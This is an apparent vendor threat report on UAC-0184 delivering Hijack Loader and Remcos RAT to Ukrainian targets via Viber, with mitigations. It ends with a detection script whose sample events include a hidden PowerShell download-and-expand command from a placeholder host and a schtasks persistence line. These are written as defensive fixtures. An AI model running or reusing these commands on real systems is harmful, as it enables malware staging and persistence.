UAC-0184 Exploits Viber for Spearphishing Ukrainian Military and Government with Remcos RAT and Hijack Loader
- Rescana

Executive Summary
A Russia-aligned threat actor, tracked as UAC-0184 (also known as Hive0156), has been observed orchestrating a sophisticated cyber-espionage campaign targeting Ukrainian military and government entities. This operation leverages the Viber messaging platform as a delivery channel for malicious payloads, marking a significant evolution in adversarial tactics away from traditional email-based phishing. The attackers distribute weaponized ZIP archives containing deceptive Windows shortcut files, which, when executed, initiate a multi-stage infection chain culminating in the deployment of advanced remote access malware. The primary objectives of this campaign are intelligence gathering, persistent access, and exfiltration of sensitive data from high-value Ukrainian targets.
Threat Actor Profile
UAC-0184 is a Russia-aligned advanced persistent threat (APT) group with a documented history of targeting Ukrainian governmental and military organizations. The group is known for its agility in adopting new delivery vectors, including messaging platforms such as Signal, Telegram, and now Viber, to bypass conventional email security controls. UAC-0184 specializes in spearphishing, leveraging war-themed lures and official-looking documents to entice victims. Their operations are characterized by the use of multi-stage loaders, advanced evasion techniques, and the deployment of commercial remote administration tools for command and control. The group’s motivation is primarily espionage, with a focus on extracting strategic and operational intelligence from Ukrainian institutions.
Technical Analysis of Malware/TTPs
The attack chain commences with the delivery of malicious ZIP archives via Viber messages. These archives, often named to mimic official Ukrainian parliamentary or military documents (e.g., A2393.zip), contain multiple Windows shortcut (LNK) files disguised as Microsoft Word, Excel, or RTF documents. Upon execution, the LNK files display a decoy document to the user, while simultaneously launching a PowerShell script in the background.
The PowerShell script downloads a secondary ZIP archive, typically named smoothieks.zip, from a remote server. This archive contains a legitimate executable, such as CFlux.exe, which is abused for DLL side-loading. The legitimate executable loads a malicious DLL that employs non-standard control flow and module stomping to evade endpoint detection and response (EDR) solutions. The DLL decrypts embedded data, reconstructs the Hijack Loader payload in memory, and injects shellcode into a newly spawned process.
Hijack Loader is a modular loader that further deploys Remcos RAT by injecting it into the legitimate Chime.exe process. Remcos RAT is a commercially available remote administration tool that, when abused, provides the attacker with full remote access, including keystroke logging, screen capture, file exfiltration, and command execution capabilities. The loader also performs environmental checks, such as scanning for the presence of security software (including Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft products) by calculating CRC32 hashes of installed program files, and adapts its behavior to evade detection.
Persistence is achieved through the creation of scheduled tasks, ensuring the malware survives system reboots. The use of DLL side-loading, module stomping, and in-memory payload reconstruction allows the threat actor to bypass static signature-based detection and complicate forensic analysis.
Exploitation in the Wild
This campaign has been observed actively targeting Ukrainian military and government departments, including the Verkhovna Rada (Ukrainian parliament). The attackers utilize Viber to deliver malicious ZIP attachments directly to targeted individuals, exploiting the trust and ubiquity of messaging platforms in official communications. The ZIP archives contain LNK files masquerading as legitimate documents, which, when executed, initiate the multi-stage infection process described above.
The exploitation chain is notable for its use of legitimate binaries for DLL side-loading and the deployment of Remcos RAT within a trusted process context, significantly increasing the difficulty of detection. The attackers employ decoy documents to reduce user suspicion and leverage advanced evasion techniques, such as module stomping and environmental awareness, to persist within compromised environments.
Victimology and Targeting
The primary victims of this campaign are Ukrainian military and government entities, with a particular focus on individuals involved in defense, intelligence, and legislative functions. The attackers craft lures that reference current events, military operations, and official government business to increase the likelihood of successful compromise. There is no evidence to suggest that the Viber application itself is vulnerable; rather, the platform is abused as a delivery vector for malicious content. Any organization or individual using Viber for official communications, especially those in high-risk sectors, is potentially at risk if proper security controls are not in place.
Mitigation and Countermeasures
Organizations should implement network-level controls to monitor and restrict the use of Viber and other messaging applications for file delivery, particularly on sensitive networks. Endpoint security solutions must be configured to detect and block the execution of LNK files and monitor for suspicious PowerShell activity, especially scripts that download and execute remote ZIP archives. Security teams should monitor for the creation or execution of CFlux.exe and Chime.exe outside of their legitimate contexts, as these are commonly abused for DLL side-loading and malware injection.
It is critical to update endpoint protection platforms to recognize behaviors associated with Hijack Loader and Remcos RAT, including in-memory payload reconstruction, DLL side-loading, and module stomping. User awareness training should emphasize the risks of opening unexpected ZIP attachments, even when received via trusted messaging platforms. Regular reviews of scheduled tasks and startup items can help identify and remediate persistence mechanisms established by the malware.
Incident response teams should collect and analyze forensic artifacts related to PowerShell execution, scheduled task creation, and process injection events. Network defenders are encouraged to implement application whitelisting and restrict the execution of unsigned or untrusted binaries. Where possible, organizations should consider disabling the ability to receive file attachments via Viber on endpoints handling sensitive information.
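A defender-side triage script for the process telemetry these countermeasures call for, added here as an illustration and not Rescana's or any vendor's code. It applies three rules to constructed Sysmon-style process-creation events (PowerShell fetching a remote ZIP, CFlux.exe or Chime.exe launched from a user-writable directory, and a scheduled task created by one of those parents); the download host, the install path treated as legitimate and the event field names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Binaries the report names as abused for DLL side-loading (CFlux.exe) and as
# the injection target for Remcos RAT (Chime.exe).
SIDELOAD_HOSTS = {"cflux.exe", "chime.exe"}
# User-writable directories: a side-load host running from here is "outside its
# legitimate context" (its real install path is an assumption, not from the report).
USER_WRITABLE = re.compile(r"\\(temp|downloads|appdata)\\", re.IGNORECASE)
# PowerShell pulling a remote ZIP archive, as the report's first-stage script does.
ZIP_FETCH = re.compile(r"(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer).*\.zip",
                       re.IGNORECASE | re.DOTALL)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Apply the three rules to process-creation events; return (rule, process) per hit."""
    hits = []
    for ev in events:
        image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        if image in {"powershell.exe", "pwsh.exe"} and ZIP_FETCH.search(cmd):
            hits.append(("T1 powershell fetches remote ZIP", image))
        elif image in SIDELOAD_HOSTS and USER_WRITABLE.search(ev["Image"]):
            hits.append(("T2 side-load host in user-writable path", image))
        elif image == "schtasks.exe" and "/create" in cmd.lower() and parent in (SIDELOAD_HOSTS | {"powershell.exe"}):
            hits.append(("T3 scheduled task from suspicious parent", parent))
    return hits

# Constructed sample events in Sysmon Event ID 1 style (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGED = r"C:\Users\user\AppData\Local\Temp\smoothieks\CFlux.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",  # launched by the LNK
     "CommandLine": "powershell -w hidden -c \"Invoke-WebRequest http://placeholder.invalid/smoothieks.zip "
                    "-OutFile $env:TEMP\\smoothieks.zip; Expand-Archive $env:TEMP\\smoothieks.zip\""},
    {"Image": STAGED, "ParentImage": PS, "CommandLine": "CFlux.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": STAGED,
     "CommandLine": 'schtasks /create /tn "Updater" /tr "%TEMP%\\smoothieks\\CFlux.exe" /sc onlogon'},
    {"Image": r"C:\Program Files\Example\Chime.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "Chime.exe"},  # assumed legitimate install location: no alert
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "powershell Get-Date"},
]

if __name__ == "__main__":
    for rule, name in triage(SAMPLE_EVENTS):
        print(f"{rule}: {name}")
```

The three rules fire in chain order on the staged events and stay silent on the two benign ones, so the same logic can be dropped over exported Sysmon or EDR process events with the field names adjusted.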
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our advanced threat intelligence and risk analytics empower security teams to proactively defend against emerging threats and ensure the resilience of critical business operations. For more information or to discuss how Rescana can support your organization’s cybersecurity strategy, we are happy to answer questions at ops@rescana.com.